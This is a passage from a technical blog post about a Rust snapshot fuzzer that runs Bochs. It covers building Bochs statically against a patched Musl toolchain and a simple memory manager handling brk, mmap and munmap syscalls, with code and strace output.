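<p>With those sizes, <code class="language-plaintext highlighter-rouge">errno</code> sits 8 + 52 = 60 bytes into the block and the whole block is 8 + 200 + 128 = 336 bytes. If a different Musl version changes <code class="language-plaintext highlighter-rouge">struct pthread</code>, the padding has to be recomputed.</p>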

<p>There may still be other accesses to <code class="language-plaintext highlighter-rouge">fs</code> and <code class="language-plaintext highlighter-rouge">gs</code> that I’m not currently sandboxing, but we haven’t reached that part of development yet.</p>

<h2 id="building-bochs">Building Bochs</h2>

<p>I put off building and loading Bochs for a long time because I wanted to make sure I had the foundations of context-switching and syscall-sandboxing built. I also was worried that it would be difficult since getting vanilla Bochs built <code class="language-plaintext highlighter-rouge">--static-pie</code> was difficult for me initially. To complicate building Bochs in general, we need to build Bochs against our custom Musl. This means that we’ll need to have a compiler that we can tell to ignore whatever standard C library it normally uses and use our custom Musl libc instead. This proved quite tedious and difficult for me. Once I was successful, I came to realize that wasn’t enough. Bochs, being a C++ code base, also required access to standard C++ library functions. This simply could not work as I had done previously with the test program because I didn’t have a C++ library that we could use that had been built against our custom Musl.</p>

<p>Luckily, there is an awesome project called the <code class="language-plaintext highlighter-rouge">musl-cross-make</code> <a href="https://github.com/richfelker/musl-cross-make">project</a>, which aims to help people build their own Musl toolchains from scratch. This is perfect for what we need because we require a complete toolchain. We need to support the C++ standard library and it needs to be built with our custom Musl. So to do this, we use the GNU C++ Library, libstdc++, which is part of the <code class="language-plaintext highlighter-rouge">gcc</code> project.</p>

<p><code class="language-plaintext highlighter-rouge">musl-cross-make</code> will pull down all of the constituent toolchain components and create a from-scratch toolchain that utilizes a Musl libc and a libstdc++ built against that Musl. Then all we have to do for our purposes is recompile that Musl libc with our custom Lucid patches, and then use the toolchain to compile Bochs as <code class="language-plaintext highlighter-rouge">--static-pie</code>. It really was as simple as:</p>
<ul>
  <li>git clone musl-cross-make</li>
  <li>configure an x86_64 toolchain target</li>
  <li>build the toolchain</li>
  <li>go into its Musl directory, apply our Musl patches</li>
  <li>configure Musl to build/install into the musl-cross-make output directory</li>
  <li>re-build Musl libc</li>
  <li>configure Bochs to use the new toolchain and set the <code class="language-plaintext highlighter-rouge">--static-pie</code> flag</li>
</ul>

<p>This is the Bochs configuration file that I used to build Bochs:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/sh</span>

<span class="nv">CC</span><span class="o">=</span><span class="s2">"/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-gcc"</span>
<span class="nv">CXX</span><span class="o">=</span><span class="s2">"/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-g++"</span>
<span class="nv">CFLAGS</span><span class="o">=</span><span class="s2">"-Wall --static-pie -fPIE"</span>
<span class="nv">CXXFLAGS</span><span class="o">=</span><span class="s2">"</span><span class="nv">$CFLAGS</span><span class="s2">"</span>

<span class="nb">export </span>CC
<span class="nb">export </span>CXX
<span class="nb">export </span>CFLAGS
<span class="nb">export </span>CXXFLAGS

./configure <span class="nt">--enable-sb16</span> <span class="se">\</span>
                <span class="nt">--enable-all-optimizations</span> <span class="se">\</span>
                <span class="nt">--enable-long-phy-address</span> <span class="se">\</span>
                <span class="nt">--enable-a20-pin</span> <span class="se">\</span>
                <span class="nt">--enable-cpu-level</span><span class="o">=</span>6 <span class="se">\</span>
                <span class="nt">--enable-x86-64</span> <span class="se">\</span>
                <span class="nt">--enable-vmx</span><span class="o">=</span>2 <span class="se">\</span>
                <span class="nt">--enable-pci</span> <span class="se">\</span>
                <span class="nt">--enable-usb</span> <span class="se">\</span>
                <span class="nt">--enable-usb-ohci</span> <span class="se">\</span>
                <span class="nt">--enable-usb-ehci</span> <span class="se">\</span>
                <span class="nt">--enable-usb-xhci</span> <span class="se">\</span>
                <span class="nt">--enable-busmouse</span> <span class="se">\</span>
                <span class="nt">--enable-e1000</span> <span class="se">\</span>
                <span class="nt">--enable-show-ips</span> <span class="se">\</span>
                <span class="nt">--enable-avx</span> <span class="se">\</span>
                <span class="nt">--with-nogui</span>
</code></pre></div></div>

<p>This was enough to get the Bochs binary I wanted to begin testing with. In the future we will likely need to change this configuration file, but for now this works. The repository should have more detailed build instructions and will also include an already-built Bochs binary.</p>

<h2 id="implementing-a-simple-mmu">Implementing a Simple MMU</h2>
<p>Now that we are loading and executing Bochs and sandboxing it from syscalls, there are several new syscalls that we need to implement such as <code class="language-plaintext highlighter-rouge">brk</code>, <code class="language-plaintext highlighter-rouge">mmap</code>, and <code class="language-plaintext highlighter-rouge">munmap</code>. Our test program was very simple and we hadn’t come across these syscalls yet.</p>

<p>These three syscalls all manipulate memory in some way, so I decided that we needed to implement some sort of memory manager (MMU). To keep things as simple as possible, I decided that, at least for now, we will not worry about freeing memory, re-using memory, or unmapping memory. We will simply pre-allocate two pools of memory: one for <code class="language-plaintext highlighter-rouge">brk</code> calls to use and one for <code class="language-plaintext highlighter-rouge">mmap</code> calls to use. We can also just hang the MMU structure off of the execution context so that we always have access to it during syscalls and context-switches.</p>

<p>So far, Bochs really only maps memory that is READ/WRITE, so that works in our favor in terms of simplicity. So to pre-allocate the memory pools, we just do one fairly large <code class="language-plaintext highlighter-rouge">mmap</code> call ourselves when we set up the <code class="language-plaintext highlighter-rouge">MMU</code> as part of the execution context initialization routine:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Structure to track memory usage in Bochs</span>
<span class="nd">#[derive(Clone)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">Mmu</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">brk_base</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>        <span class="c1">// Base address of brk region, never changes</span>
    <span class="k">pub</span> <span class="n">brk_size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>        <span class="c1">// Size of the program break region</span>
    <span class="k">pub</span> <span class="n">curr_brk</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>        <span class="c1">// The current program break</span>
    
    <span class="k">pub</span> <span class="n">mmap_base</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>       <span class="c1">// Base address of the `mmap` pool</span>
    <span class="k">pub</span> <span class="n">mmap_size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>       <span class="c1">// Size of the `mmap` pool</span>
    <span class="k">pub</span> <span class="n">curr_mmap</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>       <span class="c1">// The current `mmap` page base</span>
    <span class="k">pub</span> <span class="n">next_mmap</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>       <span class="c1">// The next allocation base address</span>
<span class="p">}</span>

<span class="k">impl</span> <span class="n">Mmu</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">new</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">Self</span><span class="p">,</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// We don't care where it's mapped</span>
        <span class="k">let</span> <span class="n">addr</span> <span class="o">=</span> <span class="nn">std</span><span class="p">::</span><span class="nn">ptr</span><span class="p">::</span><span class="nn">null_mut</span><span class="p">::</span><span class="o">&lt;</span><span class="nn">libc</span><span class="p">::</span><span class="nb">c_void</span><span class="o">&gt;</span><span class="p">();</span>

        <span class="c1">// Straight-forward</span>
        <span class="k">let</span> <span class="n">length</span> <span class="o">=</span> <span class="p">(</span><span class="n">DEFAULT_BRK_SIZE</span> <span class="o">+</span> <span class="n">DEFAULT_MMAP_SIZE</span><span class="p">)</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">size_t</span><span class="p">;</span>

        <span class="c1">// This is normal</span>
        <span class="k">let</span> <span class="n">prot</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_WRITE</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_READ</span><span class="p">;</span>

        <span class="c1">// This might change at some point?</span>
        <span class="k">let</span> <span class="n">flags</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_ANONYMOUS</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_PRIVATE</span><span class="p">;</span>

        <span class="c1">// No file backing</span>
        <span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_int</span><span class="p">;</span>

        <span class="c1">// No offset</span>
        <span class="k">let</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">off_t</span><span class="p">;</span>

        <span class="c1">// Try to `mmap` this block</span>
        <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
            <span class="nn">libc</span><span class="p">::</span><span class="nf">mmap</span><span class="p">(</span>
                <span class="n">addr</span><span class="p">,</span>
                <span class="n">length</span><span class="p">,</span>
                <span class="n">prot</span><span class="p">,</span>
                <span class="n">flags</span><span class="p">,</span>
                <span class="n">fd</span><span class="p">,</span>
                <span class="n">offset</span>
            <span class="p">)</span>
        <span class="p">};</span>

        <span class="k">if</span> <span class="n">result</span> <span class="o">==</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_FAILED</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"Failed `mmap` memory for MMU"</span><span class="p">));</span>
        <span class="p">}</span>

        <span class="c1">// Create MMU</span>
        <span class="nf">Ok</span><span class="p">(</span><span class="n">Mmu</span> <span class="p">{</span>
            <span class="n">brk_base</span><span class="p">:</span> <span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
            <span class="n">brk_size</span><span class="p">:</span> <span class="n">DEFAULT_BRK_SIZE</span><span class="p">,</span>
            <span class="n">curr_brk</span><span class="p">:</span> <span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>
            <span class="n">mmap_base</span><span class="p">:</span> <span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span> <span class="o">+</span> <span class="n">DEFAULT_BRK_SIZE</span><span class="p">,</span>
            <span class="n">mmap_size</span><span class="p">:</span> <span class="n">DEFAULT_MMAP_SIZE</span><span class="p">,</span>
            <span class="n">curr_mmap</span><span class="p">:</span> <span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span> <span class="o">+</span> <span class="n">DEFAULT_BRK_SIZE</span><span class="p">,</span>
            <span class="n">next_mmap</span><span class="p">:</span> <span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span> <span class="o">+</span> <span class="n">DEFAULT_BRK_SIZE</span><span class="p">,</span>
        <span class="p">})</span>
    <span class="p">}</span>
</code></pre></div></div>
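<p>To make the layout concrete: the single mapping is carved into a <code class="language-plaintext highlighter-rouge">brk</code> region followed immediately by an <code class="language-plaintext highlighter-rouge">mmap</code> region. The sketch below only reproduces that address arithmetic. The two size constants are placeholder values picked for illustration (the real values aren’t shown here), and <code class="language-plaintext highlighter-rouge">PoolLayout</code> and <code class="language-plaintext highlighter-rouge">split_pool</code> are hypothetical names:</p>

```rust
// Placeholder sizes for illustration only; these are assumptions, not the
// values Lucid actually uses for its pools.
pub const DEFAULT_BRK_SIZE: usize = 0x10_0000; // 1 MiB (assumed)
pub const DEFAULT_MMAP_SIZE: usize = 0x40_0000; // 4 MiB (assumed)

/// Hypothetical view of how one contiguous mapping is divided into two pools.
#[derive(Debug, PartialEq)]
pub struct PoolLayout {
    pub brk_base: usize,  // first byte of the brk pool
    pub brk_end: usize,   // one past the last byte of the brk pool
    pub mmap_base: usize, // first byte of the mmap pool
    pub mmap_end: usize,  // one past the last byte of the mmap pool
}

/// Split a mapping that starts at `base` the same way `Mmu::new` does:
/// the brk pool comes first and the mmap pool starts right where it ends.
pub fn split_pool(base: usize) -> PoolLayout {
    let brk_end = base + DEFAULT_BRK_SIZE;
    PoolLayout {
        brk_base: base,
        brk_end,
        mmap_base: brk_end,
        mmap_end: brk_end + DEFAULT_MMAP_SIZE,
    }
}
```

<p>Because the two pools are adjacent, a bounds check on each pool is all that keeps a growing program break from running into <code class="language-plaintext highlighter-rouge">mmap</code> allocations.</p>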
<p>Handling memory-management syscalls actually wasn’t too difficult. There were some gotchas early on, but we managed to get something working fairly quickly.</p>

<h2 id="handling-brk">Handling <code class="language-plaintext highlighter-rouge">brk</code></h2>
<p><a href="https://linux.die.net/man/2/brk">brk</a> is a syscall used to move the program break, which marks the end of the data segment in your program; moving it up gives the program more memory. So a typical pattern you’ll see is that the program will call <code class="language-plaintext highlighter-rouge">brk(0)</code>, which will return the current program break address, and then if the program wants 2 pages of extra memory, it will then call <code class="language-plaintext highlighter-rouge">brk(base + 0x2000)</code>, and you can see that in the Bochs <code class="language-plaintext highlighter-rouge">strace</code> output:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">[devbox:~/bochs/bochs-2.7]$</span><span class="w"> </span>strace ./bochs
<span class="go">execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
</span></code></pre></div></div>

<p>So in our syscall handler, I have the following logic for <code class="language-plaintext highlighter-rouge">brk</code>:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// brk</span>
        <span class="mi">0xC</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Try to update the program break</span>
            <span class="k">if</span> <span class="n">context</span><span class="py">.mmu</span><span class="nf">.update_brk</span><span class="p">(</span><span class="n">a1</span><span class="p">)</span><span class="nf">.is_err</span><span class="p">()</span> <span class="p">{</span>
                <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">InvalidBrk</span><span class="p">);</span>
            <span class="p">}</span>

            <span class="c1">// Return the program break</span>
            <span class="n">context</span><span class="py">.mmu.curr_brk</span> <span class="k">as</span> <span class="nb">u64</span>
        <span class="p">},</span>
</code></pre></div></div>

<p>This is effectively a wrapper around the <code class="language-plaintext highlighter-rouge">update_brk</code> method we’ve implemented for <code class="language-plaintext highlighter-rouge">Mmu</code>, so let’s look at that:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Logic for handling a `brk` syscall</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">update_brk</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span> <span class="n">addr</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// If addr is NULL, just return nothing to do</span>
        <span class="k">if</span> <span class="n">addr</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Ok</span><span class="p">(());</span> <span class="p">}</span>

        <span class="c1">// Check to see that the new address is in a valid range</span>
        <span class="k">let</span> <span class="n">limit</span> <span class="o">=</span> <span class="k">self</span><span class="py">.brk_base</span> <span class="o">+</span> <span class="k">self</span><span class="py">.brk_size</span><span class="p">;</span>
        <span class="k">if</span> <span class="o">!</span><span class="p">(</span><span class="k">self</span><span class="py">.curr_brk</span><span class="o">..</span><span class="n">limit</span><span class="p">)</span><span class="nf">.contains</span><span class="p">(</span><span class="o">&amp;</span><span class="n">addr</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nf">Err</span><span class="p">(());</span> <span class="p">}</span>

        <span class="c1">// So we have a valid program break address, update the current break</span>
        <span class="k">self</span><span class="py">.curr_brk</span> <span class="o">=</span> <span class="n">addr</span><span class="p">;</span>

        <span class="nf">Ok</span><span class="p">(())</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>So if we get a NULL argument in <code class="language-plaintext highlighter-rouge">a1</code>, we have nothing to do: nothing in the current MMU state needs adjusting, and we simply return the current program break. If we get a non-NULL argument, we do a sanity check to make sure the requested address falls between the current break and the end of our pool of <code class="language-plaintext highlighter-rouge">brk</code> memory, meaning the pool is large enough to accommodate the request. If it is, we adjust the current program break and return that to the caller.</p>

<p>Remember, this is so simple because we’ve already pre-allocated all of the memory, so we don’t need to actually do much here besides adjust what amounts to an offset indicating what memory is valid.</p>
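<p>The <code class="language-plaintext highlighter-rouge">brk(0)</code> then <code class="language-plaintext highlighter-rouge">brk(base + 0x2000)</code> pattern from the <code class="language-plaintext highlighter-rouge">strace</code> output can be replayed against a standalone copy of this logic. This is a sketch rather than the Lucid code itself: <code class="language-plaintext highlighter-rouge">BrkPool</code> and <code class="language-plaintext highlighter-rouge">sys_brk</code> are hypothetical names, the pool base is a made-up address, and a <code class="language-plaintext highlighter-rouge">None</code> return stands in for the <code class="language-plaintext highlighter-rouge">fault!</code> path:</p>

```rust
/// Hypothetical standalone version of the brk bookkeeping in `Mmu`.
pub struct BrkPool {
    pub brk_base: usize, // base of the pre-allocated brk region
    pub brk_size: usize, // size of the region in bytes
    pub curr_brk: usize, // current program break
}

impl BrkPool {
    /// `base` would come from the pre-allocated mapping; here it is supplied
    /// by the caller so the sketch needs no real memory.
    pub fn new(base: usize, size: usize) -> Self {
        BrkPool { brk_base: base, brk_size: size, curr_brk: base }
    }

    /// Same check as `update_brk` above: NULL is a query, anything else must
    /// fall in `curr_brk..limit` (so no shrinking, and `limit` is excluded).
    pub fn update_brk(&mut self, addr: usize) -> Result<(), ()> {
        if addr == 0 {
            return Ok(());
        }
        let limit = self.brk_base + self.brk_size;
        if !(self.curr_brk..limit).contains(&addr) {
            return Err(());
        }
        self.curr_brk = addr;
        Ok(())
    }

    /// Models the syscall handler: `Some(break)` on success, `None` where
    /// the real handler would raise a fault.
    pub fn sys_brk(&mut self, addr: usize) -> Option<usize> {
        self.update_brk(addr).ok()?;
        Some(self.curr_brk)
    }
}
```

<p>With a 4-page pool at <code class="language-plaintext highlighter-rouge">0x5000_0000</code>, <code class="language-plaintext highlighter-rouge">sys_brk(0)</code> reports the base, <code class="language-plaintext highlighter-rouge">sys_brk(0x5000_2000)</code> moves the break up two pages, and a later request below the current break or at the very end of the pool is rejected, since the range check is exclusive of the limit.</p>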

<h2 id="handling-mmap-and-munmap">Handling <code class="language-plaintext highlighter-rouge">mmap</code> and <code class="language-plaintext highlighter-rouge">munmap</code></h2>
<p><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">mmap</a> is a bit more involved, but still easy to track through. For <code class="language-plaintext highlighter-rouge">mmap</code> calls, there’s more state we need to track because there are essentially “allocations” taking place that we need to keep in mind. Most <code class="language-plaintext highlighter-rouge">mmap</code> calls will have a NULL argument for address because they don’t care where the memory mapping takes place in virtual memory. In that case, we default to our main method <code class="language-plaintext highlighter-rouge">do_mmap</code> that we’ve implemented for <code class="language-plaintext highlighter-rouge">Mmu</code>:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// If a1 is NULL, we just do a normal mmap</span>
            <span class="k">if</span> <span class="n">a1</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span>
                <span class="k">if</span> <span class="n">context</span><span class="py">.mmu</span><span class="nf">.do_mmap</span><span class="p">(</span><span class="n">a2</span><span class="p">,</span> <span class="n">a3</span><span class="p">,</span> <span class="n">a4</span><span class="p">,</span> <span class="n">a5</span><span class="p">,</span> <span class="n">a6</span><span class="p">)</span><span class="nf">.is_err</span><span class="p">()</span> <span class="p">{</span>
                    <span class="nd">fault!</span><span class="p">(</span><span class="n">contextp</span><span class="p">,</span> <span class="nn">Fault</span><span class="p">::</span><span class="n">InvalidMmap</span><span class="p">);</span>
                <span class="p">}</span>

                <span class="c1">// Successful regular mmap</span>
                <span class="k">return</span> <span class="n">context</span><span class="py">.mmu.curr_mmap</span> <span class="k">as</span> <span class="nb">u64</span><span class="p">;</span>
            <span class="p">}</span>
</code></pre></div></div>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Logic for handling a `mmap` syscall with no fixed address support</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">do_mmap</span><span class="p">(</span>
        <span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span>
        <span class="n">len</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
        <span class="n">prot</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
        <span class="n">flags</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
        <span class="n">fd</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
        <span class="n">offset</span><span class="p">:</span> <span class="nb">usize</span>
    <span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="p">(),</span> <span class="p">()</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// Page-align the len</span>
        <span class="k">let</span> <span class="n">len</span> <span class="o">=</span> <span class="p">(</span><span class="n">len</span> <span class="o">+</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">&amp;</span> <span class="o">!</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">);</span>

        <span class="c1">// Make sure we have capacity left to satisfy this request</span>
        <span class="k">if</span> <span class="n">len</span> <span class="o">+</span> <span class="k">self</span><span class="py">.next_mmap</span> <span class="o">&gt;</span> <span class="k">self</span><span class="py">.mmap_base</span> <span class="o">+</span> <span class="k">self</span><span class="py">.mmap_size</span> <span class="p">{</span> 
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(());</span>
        <span class="p">}</span>

        <span class="c1">// Sanity-check that we don't have any weird `mmap` arguments</span>
        <span class="k">if</span> <span class="n">prot</span> <span class="k">as</span> <span class="nb">i32</span> <span class="o">!=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_READ</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_WRITE</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(())</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="n">flags</span> <span class="k">as</span> <span class="nb">i32</span> <span class="o">!=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_PRIVATE</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_ANONYMOUS</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(())</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="n">fd</span> <span class="k">as</span> <span class="nb">i64</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(())</span>
        <span class="p">}</span>

        <span class="k">if</span> <span class="n">offset</span> <span class="o">!=</span> <span class="mi">0</span> <span class="p">{</span>
            <span class="k">return</span> <span class="nf">Err</span><span class="p">(())</span>
        <span class="p">}</span>

        <span class="c1">// Set current to next, and set next to current + len</span>
        <span class="k">self</span><span class="py">.curr_mmap</span> <span class="o">=</span> <span class="k">self</span><span class="py">.next_mmap</span><span class="p">;</span>
        <span class="k">self</span><span class="py">.next_mmap</span> <span class="o">=</span> <span class="k">self</span><span class="py">.curr_mmap</span> <span class="o">+</span> <span class="n">len</span><span class="p">;</span>

        <span class="c1">// curr_mmap now represents the base of the new requested allocation</span>
        <span class="nf">Ok</span><span class="p">(())</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>Very simply, we do some sanity checks to make sure we have enough capacity to satisfy the allocation in our <code class="language-plaintext highlighter-rouge">mmap</code> memory pool, we check to make sure the other arguments are what we’re anticipating, and then we simply update the current offset and the next offset. This way we know next time where to allocate from while also being able to return the current allocation base back to the caller.</p>
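
<p>To make the bookkeeping concrete, here is a minimal standalone sketch of the same bump logic. The <code class="language-plaintext highlighter-rouge">MmapPool</code> type, the <code class="language-plaintext highlighter-rouge">bump</code> method, the base address, and the four-page pool size are all made up for illustration; only the field names and the arithmetic mirror <code class="language-plaintext highlighter-rouge">do_mmap</code> above, and the argument sanity checks are left out:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const PAGE_SIZE: usize = 0x1000;

// Hypothetical stand-in for the mmap-related fields of `Mmu`
struct MmapPool {
    mmap_base: usize,
    mmap_size: usize,
    curr_mmap: usize,
    next_mmap: usize,
}

impl MmapPool {
    fn new(mmap_base: usize, mmap_size: usize) -&gt; Self {
        MmapPool {
            mmap_base,
            mmap_size,
            curr_mmap: mmap_base,
            next_mmap: mmap_base,
        }
    }

    // Same bump logic as `do_mmap`, minus the argument sanity checks
    fn bump(&amp;mut self, len: usize) -&gt; Result&lt;usize, ()&gt; {
        // Page-align the len
        let len = (len + PAGE_SIZE - 1) &amp; !(PAGE_SIZE - 1);

        // Make sure we have capacity left to satisfy this request
        if len + self.next_mmap &gt; self.mmap_base + self.mmap_size {
            return Err(());
        }

        // Set current to next, and set next to current + len
        self.curr_mmap = self.next_mmap;
        self.next_mmap = self.curr_mmap + len;
        Ok(self.curr_mmap)
    }
}

fn main() {
    // Made-up base address and a four-page pool
    let mut pool = MmapPool::new(0x10000, 4 * PAGE_SIZE);

    // 4096 bytes is already page-aligned, so this consumes one page
    assert_eq!(pool.bump(4096), Ok(0x10000));

    // 4097 bytes rounds up to two pages
    assert_eq!(pool.bump(4097), Ok(0x11000));
    assert_eq!(pool.next_mmap, 0x13000);

    // Only one page is left, so a two-page request is rejected
    assert_eq!(pool.bump(8192), Err(()));

    // A failed request leaves the offsets untouched
    assert_eq!(pool.bump(1), Ok(0x13000));
}
</code></pre></div></div>

<p>Note that a rejected request leaves both offsets untouched, so a later, smaller request can still succeed.</p>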

<p>There is also a case where <code class="language-plaintext highlighter-rouge">mmap</code> will be called with a non-NULL address and the <code class="language-plaintext highlighter-rouge">MAP_FIXED</code> flag, meaning that the address matters to the caller and the mapping should take place at the provided virtual address. Right now, this occurs early on in the Bochs process:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">[devbox:~/bochs/bochs-2.7]$</span><span class="w"> </span>strace ./bochs
<span class="go">execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
</span></code></pre></div></div>

<p>For this special case, there is really nothing for us to do since that address is in the <code class="language-plaintext highlighter-rouge">brk</code> pool. We already know about that memory and we’ve already created it, so the last <code class="language-plaintext highlighter-rouge">mmap</code> call you see above amounts to a NOP for us: there is nothing to do but return the address back to the caller.</p>

<p>At this time, we don’t support <code class="language-plaintext highlighter-rouge">MAP_FIXED</code> calls for non-brk pool memory.</p>
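
<p>As a rough sketch of how that decision could look, assuming the <code class="language-plaintext highlighter-rouge">brk</code> pool is described by a base and a size (the <code class="language-plaintext highlighter-rouge">BrkPool</code> type, its field names, and the pool size below are hypothetical and not taken from Lucid):</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Hypothetical description of the pre-allocated `brk` pool
struct BrkPool {
    brk_base: u64,
    brk_size: u64,
}

impl BrkPool {
    // True if [addr, addr + len) lies entirely inside the pool
    fn contains(&amp;self, addr: u64, len: u64) -&gt; bool {
        match addr.checked_add(len) {
            Some(end) =&gt; {
                addr &gt;= self.brk_base &amp;&amp; end &lt;= self.brk_base + self.brk_size
            }
            None =&gt; false,
        }
    }

    // A fixed mapping inside the pool is a NOP: hand the address back.
    // Anything outside the pool is unsupported and reported as an error.
    fn fixed_mmap(&amp;self, addr: u64, len: u64) -&gt; Result&lt;u64, ()&gt; {
        if self.contains(addr, len) {
            Ok(addr)
        } else {
            Err(())
        }
    }
}

fn main() {
    // Base taken from the strace output above; the pool size is made up
    let pool = BrkPool {
        brk_base: 0x555555d7c000,
        brk_size: 0x100000,
    };

    // The MAP_FIXED call from the strace output lands inside the pool
    assert_eq!(pool.fixed_mmap(0x555555d7c000, 4096), Ok(0x555555d7c000));

    // An address outside the pool is rejected
    assert_eq!(pool.fixed_mmap(0x7fd071bde000, 4096), Err(()));
}
</code></pre></div></div>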

<p>For <code class="language-plaintext highlighter-rouge">munmap</code>, we also treat this operation as a NOP and return success to the user because we’re not concerned with freeing or re-using memory at this time.</p>

<p>You can see that Bochs makes quite a few <code class="language-plaintext highlighter-rouge">brk</code> and <code class="language-plaintext highlighter-rouge">mmap</code> calls, and our fuzzer is now capable of handling them all via our MMU:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">...
</span><span class="go">brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
